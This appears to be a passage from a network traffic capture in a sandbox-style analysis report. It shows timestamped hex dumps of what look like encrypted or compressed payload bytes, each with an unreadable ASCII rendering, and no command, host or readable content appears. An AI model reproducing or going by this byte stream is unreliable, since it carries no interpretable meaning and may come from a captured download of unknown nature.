                                                                    2021-09-27 12:27:48 UTC105INData Raw: 46 d7 77 3a 82 a7 2b 97 69 75 c1 3e c2 9d 2b 0d 2e a8 a7 13 4a 95 9f 7c 8d 46 6b d7 22 28 a1 64 ef 08 7f 6b b1 2d 37 7e 5c d6 51 31 51 f1 d5 4f 7e ad a7 10 7c 8d c8 c5 40 9e a7 41 d8 eb 7f e9 5f 75 19 3f cb 5f c7 20 66 91 7d 57 d9 bb 41 cc ff e0 4c 3a cb bd 19 c2 25 aa 21 5e d9 b3 b4 f7 48 d2 f5 97 17 be 4d 61 ec 11 19 ca 9f 07 18 09 8f 30 e0 7d 81 16 17 13 e5 a1 f7 b3 33 19 04 cb 48 35 76 99 3e 6a 62 4e 68 3b 21 c8 fb 66 6d 33 cd ed fa cc f4 20 ef fa c6 01 e5 65 8e e0 be fc e9 f9 49 53 74 ca 86 b5 5c cf f8 fa 3c 98 bc 11 61 0a 6f d3 53 11 9d 61 83 37 7f 9d 59 fe 52 7b 6d d8 7d 0b 33 55 b7 af e6 ae 5f ae 9a df 02 03 b5 f0 58 b1 02 e6 93 a8 f1 49 db c0 0f 59 7b 0f 86 1d ec 79 90 0a 1c f7 42 41 4c 41 85 2f cf a4 45 16 08 0f 87 cc 4e a8 55 68 85 1a 07 56 8d
                                                                    Data Ascii: Fw:+iu>+.J|Fk"(dk-7~\Q1QO~|@A_u?_ f}WAL:%!^HMa0}3H5v>jbNh;!fm3 eISt\<aoSa7YR{m}3U_XIY{yBALA/ENUhV
                                                                    2021-09-27 12:27:48 UTC107INData Raw: 58 20 03 13 24 5c aa 37 90 38 be bf b1 80 e6 a4 36 97 51 69 01 13 69 72 a1 77 1a ce e5 40 18 10 4d 19 54 88 91 b3 bb 8f 29 78 eb 24 5c c5 f3 42 84 ee 74 63 51 df f9 0c cb 6b 9b a1 ff cd 47 8e eb c4 60 58 86 85 fc 28 1f b0 78 34 a5 3d da 51 6f 7e eb 1f 32 5b 86 b5 f6 92 c1 1f 70 fe 2a eb 15 1a fe 84 be 1c b5 83 d5 a3 f2 cc 6d 7d e0 7c 23 5f 44 ae f0 5d 0c 6b 0e 3d e8 5e 0a 0c a3 b8 82 9b 96 3a fe 9e 33 05 aa dc 68 59 fb 75 44 d4 f3 df b7 52 9a 4a 0b 75 76 06 6f 65 27 ec f7 ad 09 63 71 dc ea 1e 82 9b 7b 78 61 8c bd 2d 73 07 29 99 f3 70 0a a4 a0 b0 e1 f4 f8 a1 4a 12 49 95 4e 93 96 29 13 28 69 31 d3 4b 2a 8b 43 bc 0e 78 4f 69 5e 7e 93 8e 50 8c a2 3b 0c 9f aa 9e f4 47 d7 76 6a 9b 73 bb 16 c4 87 41 0d 62 43 25 be a1 36 ea f9 13 f4 84 b8 dd 15 12 ca b0 4a 36 ba
                                                                    Data Ascii: X $\786Qiirw@MT)x$\BtcQkG`X(x4=Qo~2[p*m}|#_D]k=^:3hYuDRJuvoe'cq{xa-s)pJIN)(i1K*CxOi^~P;GvjsAbC%6J6
                                                                    2021-09-27 12:27:48 UTC108INData Raw: a4 66 90 8f e5 74 ec 38 35 4c 1e a5 05 f5 88 a5 b9 0e de 4e 85 84 5b 86 b6 1e 78 ab d1 32 3c 26 da 3c 6f 7a 3a 52 bc 4d 44 57 b7 2e 03 84 ef 91 0b 5f 9f 5d 08 5d 73 bc 73 5b 44 59 f9 24 55 71 7d af a7 fa bb 94 74 5f 81 b2 30 d7 75 75 c0 0c a2 04 b9 6c 46 3e 02 13 b3 4d 8d e3 a7 71 88 89 c7 49 3f 84 d9 b9 54 43 52 05 03 38 d2 51 6d 24 70 75 28 34 d8 74 fa ed bd 28 4e e0 94 23 ac 56 23 4a 00 4b f6 2d d8 f5 7a 6b ed 4d 9b 8e 32 10 89 28 66 b3 d0 c4 f4 9d fb 8a 69 4a cc f9 6b c1 b4 68 b7 93 12 cf 72 f0 00 7b 48 f9 68 3f d2 1c 28 78 29 ac 3b 58 85 95 8d e2 84 13 d4 75 d7 ba ca 4a a9 93 75 3a ae e7 fc 05 bf d8 f2 54 15 39 95 c0 c7 83 8f e3 20 40 78 42 81 f3 b6 0d 07 c5 2f b1 5e 97 86 50 ca 3f a2 bb cb d1 92 3c 66 99 33 42 15 b7 eb 4e 10 e0 56 90 c4 67 e8 bc 76
                                                                    Data Ascii: ft85LN[x2<&<oz:RMDW._]]ss[DY$Uq}t_0uulF>MqI?TCR8Qm$pu(4t(N#V#JK-zkM2(fiJkhr{Hh?(x);XuJu:T9 @xB/^P?<f3BNVgv
                                                                    2021-09-27 12:27:48 UTC109INData Raw: 0d 8c 82 59 e7 2e 3b ae a1 0e 08 ce 79 6e 31 dc 8c 24 02 a7 88 b6 02 42 88 b1 6f a1 45 68 ec 3e 28 b0 66 d8 2b 80 6a 97 40 20 7d 54 d2 4e ee 66 aa de 5e 7d 0b b8 05 aa 0a 9e e4 41 9f b0 59 d1 f1 66 ee 58 12 a0 32 35 54 fa 33 72 9b fb ff cb d9 f5 eb 72 df 46 47 d6 b0 06 d6 3c a5 3d 09 0f 2e 83 e8 46 2d f2 a1 65 37 09 7d ed 10 15 f7 c2 46 22 fd 58 78 fd 72 98 15 3f ba ef be e5 5e 38 1d 46 cf 4b 37 6a e2 70 42 59 45 7b 3a 17 71 f2 e8 d0 98 f9 36 ed 1e 66 12 fc f2 c7 03 e0 6b 92 08 ae dd f6 ef 70 43 44 e4 93 b8 44 d1 e9 e6 2a 96 ae 61 d7 0e 61 d7 50 13 93 70 db a8 c8 a3 59 f4 7b c0 63 e0 21 77 11 54 b0 ba f5 a2 64 0d 9a ce 00 21 ea f1 74 ba 10 e4 af 0b f3 4c d1 cd 08 c7 74 0f 97 14 e3 88 80 29 07 e5 47 fb 8b 66 19 3b 43 91 4f 0b 1a a5 96 d2 5e a4 a6 e7 1e 9c
                                                                    Data Ascii: Y.;yn1$BoEh>(f+j@ }TNf^}AYfX25T3rrFG<=.F-e7}F"Xxr?^8FK7jpBYE{:q6fkpCDD*aaPpY{c!wTd!tLt)Gf;CO^
                                                                    2021-09-27 12:27:48 UTC111INData Raw: 06 84 e5 cd b2 15 f8 3f 70 a8 21 80 08 b1 a7 f5 81 ca a6 f2 95 7a 9b 2b 63 76 73 a7 67 18 76 e5 68 05 38 5c 13 56 9d 86 e5 93 8f 29 78 cf cd 4c ed f9 6f 3a e8 63 e4 2b f8 f8 0d dc 47 8a b4 d9 e1 4a 4d ea c2 c2 ae 80 91 f9 2a 24 17 40 8c ae 15 cb 51 7e 70 ff 16 b8 31 aa a5 f5 86 28 1e 70 f0 21 83 c4 2a ef 89 ce d1 a6 87 df 9a e7 d3 64 89 f2 54 02 4c 3b 92 d9 53 0d 43 53 2a 65 53 22 ee a6 ac 90 a7 0e 9b fe 94 11 09 31 dc 62 3c 4b e9 44 de 96 81 a7 55 ff ab 14 7f 6f 2f a8 aa 35 e4 0e d9 1e 72 73 c5 d1 0e e0 ee 0c 43 6b f1 94 43 24 03 33 80 2b 78 11 7e a9 6b c8 ef f6 81 40 05 4c bd cc bd 96 2f 18 0a 4c 22 d7 41 e5 8f 5e 68 0f 54 66 77 25 56 90 8e 6b a4 b3 b3 0c 83 82 7f f0 47 d1 5e da 99 d0 12 3e f5 9d 41 07 0c c8 15 ba ab 52 b9 f8 13 0e a2 a4 df 07 01 de 8c
                                                                    Data Ascii: ?p!z+cvsgvh8\V)xLo:c+GJM*$@Q~p1(p!*dTL;SCS*eS"1b<KDUo/5rsCkC$3+x~k@L/L"A^hTfw%VkG^>AR
                                                                    2021-09-27 12:27:48 UTC112INData Raw: 2e 0a 8d a5 66 96 e6 ec 75 ec 32 1d 1b 1c a5 03 dd a6 54 b8 08 b1 c5 84 84 51 34 a7 14 6f 67 c2 38 2c 37 fb 28 5e 3c 2a 5b 94 ae 44 57 8d 10 e1 89 61 20 16 87 f7 68 1a 51 4f 2d 5c 5b 44 42 dd 39 5b 90 45 be 8f 17 92 a4 7e 57 9a 9c ea 7a 41 7b d1 01 9b fc aa ba da 09 36 3b 5a 46 a5 d8 af 60 8a 7c 76 29 83 97 d5 ab 89 50 34 6f b5 0a de 55 62 3d 7a d6 d9 26 d3 5b c7 08 b0 39 44 d0 66 b9 b3 4c 64 10 03 4b f6 fb 88 d8 8a 8a fe 46 b9 d8 34 38 76 2e 60 da 18 bd d3 96 ea 80 50 b5 d9 f7 b7 ff ff 9c b6 99 7b 13 66 f1 0a af 57 dc 5d 39 bd dc 02 40 23 bd 3e 97 8b ac ba 38 92 76 fe 7e d0 90 e4 58 c7 c4 7f 29 b4 2a f3 11 f2 db f2 5a 52 04 91 c0 cb bd 9a fb 22 31 67 72 81 f7 ae 27 da c8 3e a1 74 21 a3 51 c0 2a 99 20 01 d3 94 1e 53 95 2b 9e 11 93 38 43 01 f4 7b aa 2a 9c
                                                                    Data Ascii: .fu2TQ4og8,7(^<*[DWa hQO-\[DB9[E~WzA{6;ZF`|v)P4oUb=z&[9DfLdKF48v.`P{fW]9@#>8v~X)*ZR"1gr'>t!Q* S+8C{*
                                                                    2021-09-27 12:27:48 UTC113INData Raw: e1 d8 b5 90 b1 99 4d c6 9e ed 3f b8 2c 06 9e 7c f5 1d d2 96 34 08 c3 a1 8b 0e 53 84 79 12 58 44 73 c2 35 35 a3 67 f0 0e 8a 75 a8 ca 33 51 5d f1 4d e6 79 ca cb 79 67 8e 0f 03 77 98 ac 1a 40 b2 aa 66 3e f8 77 e9 51 67 15 3b 35 4f e0 2b 22 6c 74 64 ef 6a 06 0b ff e0 40 40 b8 40 18 c6 3c d5 e2 54 d9 a8 ab 32 29 fd f6 bb 0c b3 59 82 ec 11 1b c0 b3 54 29 f7 61 c4 e0 5c 6c 1f 3b 17 e4 a6 39 4e 3b 22 cb 5f 9d 3e e7 3a d6 bf a4 b0 97 2e 26 73 f2 66 76 45 f1 c4 04 c9 c7 35 ed f8 dc 50 e6 85 6a e1 a0 f9 f3 fa 58 45 4e fb db 57 4e eb de e2 23 51 a2 80 9c 27 76 d0 57 76 7e 7c 55 19 2b 4c 5b f4 70 c4 b5 b7 a6 74 11 5e d8 51 f8 b4 4a 70 97 d1 49 0b 40 f1 65 b1 1e fa 45 22 df 4f fa 83 0c 5f 60 04 97 04 fb 9e 6f 27 3d f8 5c 5a 14 de 19 f7 dc a7 42 11 08 0c 87 cc 4d aa 95
                                                                    Data Ascii: M?,|4SyXDs55gu3Q]Myygw@f>wQg;5O+"ltdj@@@<T2)YT)a\l;9N;"_>:.&sfvE5PjXENWN#Q'vWv~|U+L[pt^QJpI@eE"O_`o'=\ZBM
                                                                    2021-09-27 12:27:48 UTC114INData Raw: bb 27 56 98 99 8e cb 28 38 0c 9f 8a 10 0f 46 d1 58 c5 bf 60 ba 3e f1 8c 5e 3d f3 da 09 af ac 36 44 f9 13 f8 b3 ac a1 c3 10 db be 4a 01 57 29 fe f6 40 8e a5 6c 4f e3 85 2a a6 b7 47 e0 df 6f f8 02 fa 8e 20 14 2c ab b8 2f bc 83 4d 6e a2 4c 64 12 bb 3f 6a 7b 26 92 aa 6a 9d 35 3e 62 7a da 56 e7 68 c1 cb 68 8a 84 23 1b 44 71 48 1b be 81 8b 4d cb f8 66 e2 51 57 f8 31 19 52 fa 33 79 fd 8c 49 cd 6b 76 dc ed eb 46 56 dc a3 14 38 3b 96 39 25 d9 a0 bc ee 55 29 eb b5 15 b0 36 6c e6 0e 32 21 f0 6b 2f f4 fe 78 f6 6a 44 c4 04 06 f2 8e fc 46 32 24 16 d1 58 c3 68 a1 e5 41 d7 f8 61 29 df ba ea 62 78 5a fd e7 fa d9 e0 26 dc 0c c7 3c f8 73 8d c8 bc d9 f7 27 c9 82 46 6a 2e 97 17 3d 07 14 2b a6 b6 e4 60 37 7d c0 ae 18 ae 7e 42 0c 4f 9c 48 ff 65 96 91 d9 5b 74 3a 51 8f dc 00 4b
                                                                    Data Ascii: 'V(8FX`>^=6DJW)@lO*Go ,/MnLd?j{&j5>bzVhh#DqHMfQW1R3yIkvFV8;9%U)6l2!k/xjDF2$XhAa)bxZ&<s'Fj.=+`7}~BOHe[t:QK
                                                                    2021-09-27 12:27:48 UTC115INData Raw: 87 c0 ab af eb 0a 55 5b 60 84 f3 ad 31 d3 3b 2e 9d 52 ef b6 8b dd ed 07 64 cf d1 95 18 5b 8a 36 48 13 9a 37 b1 11 ca 57 96 d7 18 c1 74 77 75 5c a9 4c 40 85 e5 5c 38 1c fe 20 70 b9 25 82 c6 b8 8b 4a 97 c7 bc 0e 90 7a 9b 06 73 8d 72 8d 79 36 a2 d9 ea 0f 10 4d 0f 45 92 8b 8a 05 98 d7 73 ef c7 40 d6 f0 6a 2b eb 68 97 2d d4 f2 0f c9 7d 9b 4d 30 36 5a 5b ef c4 71 ba 9b 7b ec 12 1b b6 3b c9 a5 3d de 53 05 3c f5 11 c8 52 bc a6 dc dc e8 1e 7a e4 21 81 ef 0b fb 94 5f 12 8a 96 d7 c9 b1 d2 64 87 e3 2b 4c 5c 3f 82 2b 57 13 50 50 3c f9 51 3d e7 59 b9 a8 b5 2e 12 e1 9e 08 24 aa cd 67 20 9d 74 68 dd 8b 9e b3 52 81 69 0b 74 9b 03 43 76 08 f0 31 23 db 8d 8c cd fe 3d 32 17 86 87 63 db 95 2c 60 33 31 8a c4 70 1b a0 b5 4e e0 c9 e0 8a 61 3d 49 92 d4 46 97 05 10 3a 7f 22 d0 53
                                                                    Data Ascii: U[`1;.Rd[6H7Wtwu\L@\8 p%Jzsry6MEs@j+h-}M06Z[q{;=S<Rz!_d+L\?+WPP<Q=Y.$g thRitCv1#=2c,`31pNa=IF:"S
                                                                    2021-09-27 12:27:48 UTC116INData Raw: 0c 0e 42 85 f5 ba 01 ef b9 58 ba 48 d1 cf 9d fd 69 27 a2 14 f0 8d 8a 35 1c f4 5b 54 85 65 f0 2c e3 99 49 1a 1e 01 96 d8 d7 39 80 69 a9 11 08 56 40 64 39 65 78 b7 61 81 c9 ef 65 e9 b4 0a 4c 1e a4 a7 e4 8f 42 90 be de bd 8e ac b6 97 b6 14 50 6c d3 32 37 a1 f5 34 7c f3 3b 43 b1 b8 4b a9 a7 2a f7 83 c3 88 1e 4d f7 77 09 4c 7a 88 a2 5a 68 59 dc 5c 45 0a 5a b5 ad e3 80 a9 74 4e 86 8b 25 52 53 58 ca 19 8e e7 6b 7f 44 09 3e 00 be 47 b4 df b8 60 7c a5 8c 30 9c 8e cf 23 73 61 22 f3 11 35 d4 4c 67 33 7f f0 0e 19 d2 61 d7 0e 6f 3b 4d d7 be 30 a1 5c 5d f4 1d 58 02 f2 b5 dd 43 54 fa dd a8 98 ca c7 83 33 72 a6 df bf c2 91 e4 96 bf bf e4 f4 7c ed 81 61 89 86 83 83 8f ef 13 b6 49 d1 4e 32 cb e8 01 6c 37 ae 4a cf 84 bd b1 f4 8d 6d 8b 7f d0 97 da 4f bd 8d 74 3a a0 b5 49 56
                                                                    Data Ascii: BXHi'5[Te,I9iV@d9exaeLBPl274|;CK*MwLzZhY\EZtN%RSXkD>G`|0#sa"5Lg3ao;M0\]XCT3r|aIN2l7JmOt:IV
                                                                    2021-09-27 12:27:48 UTC118INData Raw: f1 55 4b 63 34 52 9b 1f 58 b9 ea 3f 0c 84 87 65 0e 46 fd 5b cc 94 68 a2 3b e0 96 44 1a f3 da 09 ab ac 71 af fd 13 f8 aa 28 e5 11 12 da db 81 38 44 28 d8 f9 58 94 9d 83 4b d6 77 3a 82 ad 2a 0a da 75 ed 18 c3 8c 2e 03 c3 a1 8b 01 5a 91 64 7d b0 40 6c cd d4 29 9c 67 f9 0e 85 e4 2a 06 97 62 5e da 58 e7 68 cf ca b1 75 a9 07 1b 6b 51 b8 fb 48 8d a6 5e d1 fd 6f 17 4f 51 0f 43 8c 5e eb 3e 68 8b 66 4d cd 7c 6c e1 00 e1 6a 44 c0 af 1c c6 2b bf 2d 5c 27 a3 90 ea 6d 29 cc eb f9 44 c9 7a 82 c3 1d df fb 6d 22 ec 40 ca ff 4d 92 1e 17 ff ed be fe 4f bc 82 1e 40 fc eb 7e 57 ff 94 d4 64 68 31 08 6b fb 61 65 c0 59 c4 da c9 eb 33 ff e4 c1 12 63 cd 96 90 08 f8 f7 f0 58 5e 42 ee 47 b9 6a ef cf eb 34 8d a9 fb 6a 0e 4e d6 50 13 5c 7d 53 35 44 9d 49 f4 7a d3 6f d8 77 5b 3c 54 a7
                                                                    Data Ascii: UKc4RX?eF[h;Dq(8D(XKw:*u.Zd}@l)g*b^XhukQH^oOQC^>hfM|ljD+-\'m)Dzm"@MO@~Wdh1kaeY3cX^BGj4jNP\}S5DIzow[<T
                                                                    2021-09-27 12:27:48 UTC119INData Raw: 2a 40 96 c0 c1 aa b8 c0 31 69 46 65 0d cc bc 34 ca 67 3e 92 48 f8 b5 79 69 3b 8a 45 db f9 50 17 42 9f 25 c5 05 9f 29 4e 04 f2 51 bc 76 63 87 7f 5f 60 5f 7f 3b 15 88 ec 4c 0f d6 ee 25 76 bf ad 9c 38 b9 a6 5c a2 db 85 0b 83 f6 b5 03 68 72 d1 b0 50 24 a0 f3 40 ac 10 4d 19 42 bf 48 98 00 89 3e ff c4 c4 58 c4 e6 48 2b cc 62 7e a0 c7 f8 0c ce e3 8a 90 db dd 53 60 49 c4 60 b5 92 ad 29 3d 0c b2 56 01 a3 3d da 50 6a 6e e0 39 6f 5a aa af dc f8 e9 1e 7a e9 39 95 ea 32 a5 8f a1 19 8e a9 d7 b2 f0 bc fc 83 e1 5a 1b 51 4b 94 f1 5d 13 52 5e 48 fa 54 22 f5 8f ac 86 b3 20 2b f3 80 cb a0 aa dc 63 1e 77 75 44 d4 b4 91 b5 52 96 75 99 78 65 02 6e 67 00 e4 2a ba 34 7f 5b d5 fd 02 fb 4b 68 5b 7c 8f d9 2d 73 07 91 9b d4 68 04 b8 30 71 e0 d8 f7 23 5b 35 5a b7 d2 9a 82 3d 0b af 5b
                                                                    Data Ascii: *@1iFe4g>Hyi;EPB%)NQvc_`_;L%v8\hrP$@MBH>XH+b~S`I`)=V=Pjn9oZz92ZQK]R^HT" +cwuDRuxeng*4[Kh[|-sh0q#[5Z=[
                                                                    2021-09-27 12:27:48 UTC120INData Raw: a6 90 e6 bd 18 4b fb 58 a7 10 f2 af 0b 74 4a d1 cd 05 c7 74 0f 97 14 e4 93 85 0e b2 f4 4a 53 b2 f5 0e 2d c5 bd 55 1a 07 13 af f5 42 b5 ad 7f 24 17 00 41 cc 77 2d 71 51 07 66 90 c4 d1 5c e9 38 33 5a 36 54 04 f5 82 7a f4 1f c2 a9 ac 03 58 96 b0 08 f5 b6 d1 32 3c 29 fe 2d 47 5d 3b 52 b6 b3 6c ab a2 06 f6 98 62 90 01 5d e5 69 2a 4c 54 82 74 0c 46 53 d2 8a 46 29 4d 86 89 fc 93 a2 d6 4e a8 80 26 b8 7a d7 c0 08 80 d8 21 6c 40 1c 0e 1c b1 47 a3 c1 bc 63 a7 8c 4a 38 8d 8c e3 55 a1 be c2 3f 0c 2a f1 a3 7c 01 72 0e 14 5a 8f 70 d2 13 65 5b be c9 b0 25 bf 4f 5d ea 13 51 d4 a4 9b d0 54 74 c3 4f 91 85 5a 40 7c 2c 6c 9d dd bd d3 9a 94 79 40 be ce ea 7b f8 86 07 4b 98 7d 7a 66 9f db a7 44 db 30 c3 d3 16 06 56 46 7d 33 86 8f d2 49 e3 84 1f 1d 10 01 94 cc 47 a9 38 74 3a a2
                                                                    Data Ascii: KXtJtJS-UB$Aw-qQf\83Z6TzX2<)-G];Rlb]i*LTtFSF)MN&z!l@GcJ8U?*|rZpe[%O]QTtOZ@|,ly@{K}zfD0VF}3IG8t:
                                                                    2021-09-27 12:27:48 UTC121INData Raw: 95 a6 43 23 7a 76 79 4a aa 93 8e 52 b2 96 eb 0e 95 88 10 0c 46 d1 58 cd f6 a2 b3 3e ea e8 bd 06 0d dd 32 d1 7a 5b b8 f2 7c 00 a3 a4 c8 02 01 c4 af 46 2d 44 33 e9 fb b5 90 b1 94 4c dc 9c 26 bd bc 28 08 c9 70 e5 e3 c2 b1 08 05 2f cf 5b 03 42 84 77 12 70 47 73 ce 45 d4 b1 6c f6 07 ee bb 9f 34 38 12 aa c8 5d e1 6a db cb 53 67 92 0f 03 6b 9f 4b e5 6d 97 d0 e4 c0 f8 7d e3 57 6e 11 30 24 49 f4 2b 9d 93 59 6b dc 60 06 0b ff e0 40 51 b8 6d 1b c6 30 d5 ce 57 d9 a4 a4 87 97 2e f4 b1 69 45 37 7d eb 02 13 c0 d1 54 35 f7 61 d8 e0 61 6c 1f 3b 1c fc b7 fe 47 5d de 1f ce 41 52 ee 8c e8 48 41 20 e0 30 09 6a 96 ef 66 4e e4 e0 e5 dc f8 2e fc e3 d1 0f e3 84 94 32 af f8 cc f4 58 52 36 60 98 a9 45 d4 ff f4 3b 94 b2 ef 71 31 69 c7 ae 18 ae 6f 43 0e 4d f3 95 f5 7a d9 78 02 64 60
                                                                    Data Ascii: C#zvyJRFX>2z[|F-D3L&(p/[BwpGsEl48]jSgkKm}Wn0$I+Yk`@Qm0W.iE7}T5aal;G]ARHA 0jfN.2XR6`E;q1ioCMzxd`
                                                                    2021-09-27 12:27:48 UTC123INData Raw: d8 f2 50 37 cf 91 c0 ce ab ab e3 3a 4a 50 72 9a c3 b5 34 91 c4 2f b1 59 ed a1 40 c8 31 88 59 a0 30 95 14 48 86 6c 7b 0a 9d 3e 20 18 e7 45 9e df 65 af e9 77 71 55 57 57 07 84 ef 55 54 33 ec 25 7a bb 24 8a 3c ad 8f 67 85 ca a0 0a 18 7d 8a 03 69 60 75 b0 75 26 b7 45 79 09 04 59 3b 9f 96 8b 91 11 8b 3d 5a ea c0 58 c3 e2 e7 3d ee 74 68 3f fe e9 0a d9 56 17 39 cf c9 46 ea fb c2 74 ab ae 4c ec 3e 06 a5 44 98 8c 17 de 51 78 6d 79 16 cc 5a ab b6 f2 f8 ef 08 74 58 23 82 fb 0e d6 47 a0 13 ac 96 d1 a6 de f8 60 83 e7 47 87 5a 3f 86 f0 4e 0e 52 53 2a ff d8 ae ee a7 b9 26 a2 20 2c ea bc d2 20 aa d6 73 32 77 5d 68 da 9c 8b a0 df 97 6c 14 7e 71 16 7b 5c 80 f5 09 a6 31 5a ce c7 fd 04 e8 64 7e 78 6b f0 86 2a 62 05 25 83 55 61 1d b7 aa c2 df d8 f6 80 e8 07 4f 8d ca 36 21 a5
                                                                    Data Ascii: P7:JPr4/Y@1Y0Hl{> EewqUWWUT3%z$<g}i`uu&EyY;=ZX=th?V9FtL>DQxmyZtX#G`GZ?NRS*& , s2w]hl~q{\1Zd~xk*b%UaO6!
                                                                    2021-09-27 12:27:48 UTC124INData Raw: 82 30 4d a6 9e e6 52 1a 4b fb 09 39 00 ee bf 26 e5 4b aa 48 12 4a 77 0d ec 91 f1 87 95 0e fc f6 4a 53 98 6c 80 9a b2 28 4e 0b 1f 05 85 a6 c0 b4 ab 6d 81 48 02 41 c7 1e bc 64 79 a0 4c 90 ce ea 44 ee 38 0f 4d 1e a5 0c f4 88 47 ae 1d da 85 a8 85 5b 96 b6 0f 7c ac 2f 33 11 33 e8 42 ec ff 3b 56 94 f0 46 57 ac 18 e3 84 ef 86 05 4a 1a 7b 25 5e 6f 87 58 5b 55 57 cb 25 a9 0b 76 a1 a5 85 16 a5 74 5b a3 c3 30 ac 58 6b ce 1b 8e f0 ac 68 5f 1d d8 12 9f 52 a7 a9 22 70 82 a0 de 48 8c 86 d3 9b 26 40 3d eb 0f 27 d8 4e 6e 2c 63 0a 17 cb d9 5c c6 1b c2 57 49 c8 b4 5d de 5d 4c f3 2a 32 fd f3 93 da 4b 4f e9 4d 80 87 2a 31 82 2d 4a b2 da 93 10 83 f1 9d 45 be d9 fd 73 17 91 44 a2 9b 06 fd 71 f0 0e db 36 d0 5f 35 fa 6f 01 40 23 a0 2e 8f 96 b9 b5 f3 80 03 f4 7e fc 98 ce 36 b9 c5
                                                                    Data Ascii: 0MRK9&KHJwJSl(NmHAdyLD8MG[|/33B;VFWJ{%^oX[UW%vt[0Xkh_R"pH&@='Nn,c\WI]]L*2KOM*1-JEsDq6_5o@#.~6
                                                                    2021-09-27 12:27:48 UTC125INData Raw: fa 49 3b 89 72 2c 71 cd 66 6b 21 49 9c 14 71 89 f6 1c 13 9b a2 e7 f0 47 d1 41 d0 b1 5e b3 3e e6 ad 2f 79 94 da 25 ba b4 56 22 dd 3e f1 84 bb c1 31 b0 db b4 55 25 56 0a d3 e5 4b 97 b7 fc 30 56 88 3b aa b4 38 83 fb 42 f1 3b dc 8d 0b a0 3d a0 a7 1d 51 aa 4c 7f a1 43 59 ae 54 b1 b1 6c f4 00 90 f0 b8 19 3c 5b 4b d8 7d 20 79 ca d4 57 5c a8 0d 12 7a ad df 9a d8 9f a3 5a df ea ed cc 63 73 20 2f 27 7e 22 34 63 92 68 60 e0 6f 69 f1 d4 8e 38 de d6 bc 1d d9 29 20 17 7b d6 84 a3 fb 66 fc f4 bb 06 a4 27 55 c0 13 1d d9 db 2d 5c 6e 71 cf fb 6d 86 84 32 2f e3 98 f0 59 12 d4 1d ce 4b 20 41 a0 ea 42 5f 65 06 4f 90 61 f9 62 78 5b 74 c9 d7 c7 cd 26 e9 d2 2e 10 ed 7a 8a 11 97 fd e2 f1 5e 7e 2b 9a 00 a8 4f c3 e7 fd ae a2 88 e0 46 39 60 f6 a7 19 82 7d 4a 09 6c b1 5b f4 7c f9 05
                                                                    Data Ascii: I;r,qfk!IqGA^>/y%V">1U%VK0V;8B;=QLCYTl<[K} yW\zZcs /'~"4ch`oi8) {f'U-\nqm2/YK AB_eOabx[t&.z^~+OF9`}Jl[|
                                                                    2021-09-27 12:27:48 UTC127INData Raw: d8 61 a5 f9 5d 52 3d cd 86 e8 ec a9 ab e5 0a 20 2e ea 80 f3 b8 2b f5 5f 0a 9c 52 ca be 6f ea 8b 88 4f cf c6 bc 39 40 99 35 62 68 e1 b0 4e 10 e2 5a ab 4f 46 aa 7b 51 6e 60 5f 80 04 84 e5 44 0f 38 ef 25 76 82 4e e5 a1 b8 a7 4b 9e 8a 3c 38 b8 75 ac 1c 28 53 c4 a3 73 30 ab f4 40 22 12 4d 15 7c f9 f5 02 01 8f 2d 6d 82 5e 7d e8 fa 4c 25 af 54 a3 2e f8 f8 13 c4 69 b6 b0 cf cf 6d 26 94 5d 61 bf 82 9a af a4 29 99 4f aa bb 7f fa 84 7c 7a f4 0e c3 72 87 a7 f4 ef c3 70 0e 63 33 84 eb 05 bd 14 84 3e a9 a1 ca f1 d6 37 66 83 e1 4f 06 75 12 84 f1 5b 22 29 2b a5 e9 54 26 f1 e3 22 a1 9e 28 1e e1 d0 3b d1 a8 dc 62 2d 4b 58 46 de 9a a7 dc 2c 09 6d 14 7b 7a 47 f5 51 0e fb 2f b3 60 52 86 c6 fd 02 ea c1 54 7a 6b f7 bf 42 0d 9a 32 8a f3 6f 5d 3a 99 63 ef fe e9 c7 6a ec 4b 95 c3
                                                                    Data Ascii: a]R= .+_RoO9@5bhNZOF{Qn`_D8%vNK<8u(Ss0@"M|-m^}L%T.im&]a)O|zrpc3>7fOu[")+T&"(;b-KXF,m{zGQ/`RTzkB2o]:cjK
                                                                    2021-09-27 12:27:48 UTC128INData Raw: 54 b7 b4 ec 9c 61 a4 9a c8 20 72 35 68 75 ba 05 f1 d6 b9 d6 64 df ed 0c 27 53 07 92 15 f0 9b b9 0b 13 f4 4c 73 f4 17 97 2c cf aa 50 65 81 22 aa d2 60 aa c5 49 a7 15 00 41 d2 73 11 48 7b a4 60 ba a4 87 ed ed 38 31 53 71 3f 20 d8 86 70 a7 61 fe a3 81 84 5b 8b 9e 33 7a b1 d7 18 53 43 73 38 6f fa 24 22 26 82 69 58 80 19 80 a0 ca 92 01 5d fb 6b 21 70 75 94 5a 71 2e 2d 4d 29 57 0e 45 df 3d db be aa 52 40 fa b4 04 a9 52 74 dd 20 a7 f2 bd 6a 6a 78 58 8a b2 47 a1 cd d5 eb a7 89 af 1c 92 f4 f9 8e 5a 41 3d fe 1b 10 f9 5f 6a 2a 58 60 71 ac d9 70 d6 06 ca b2 6d e5 bf 05 b3 2f 6c af 07 4b fc ec 94 f8 7f 5e ed 4b bb ed 4b a1 7d 2c 62 aa a6 25 f6 b1 f4 a8 5e ca e8 9a 68 e9 90 77 a0 b1 50 7e 70 f6 20 cf 3a 48 5e 3f d6 09 75 da 0c 81 3f a0 9a c8 95 98 81 19 0a 62 f8 bb ce
                                                                    Data Ascii: Ta r5hud'SLs,Pe"`IAsH{`81Sq? pa[3zSCs8o$"&iX]k!puZq.-M)WE=R@Rt jjxXGZA=_j*X`qpm/lK^KK},b%^hwP~p :H^?u?b
                                                                    2021-09-27 12:27:48 UTC129INData Raw: 24 5e a0 a9 d2 3a 8f 5c 62 98 54 67 6b bf 73 bf 9f 72 84 6e 3a 0c 95 a2 ef f7 47 d1 44 f2 b4 71 b1 38 ca 05 3f 9e 0c db 21 9e 33 59 b8 f8 89 db 8f b5 e8 31 8a db b4 55 1a d0 25 fe e7 52 b9 b0 90 4e c9 a3 bd d0 32 29 19 da 4f 67 1d c3 9d b1 31 10 b2 81 22 db 82 61 7d 81 d2 74 c4 2a 37 ba 44 dd 1d 81 6c b7 b2 4c e4 55 c9 59 c7 e3 ca d4 4f ee a0 22 00 5a a7 2f e4 41 9e 83 ff c7 f8 77 f6 44 55 2b 32 35 58 c1 b2 1d 0b 74 48 c9 4d f2 f7 fe e0 dc 62 fa ae 3f e6 a1 ba 32 56 f9 09 bb e8 46 33 fe 93 2b b9 36 7b c7 97 63 46 f0 47 26 d7 ec cf ff 72 08 3b 3a 10 cb 9e 73 4d 32 35 3d 7b 4c 3d 69 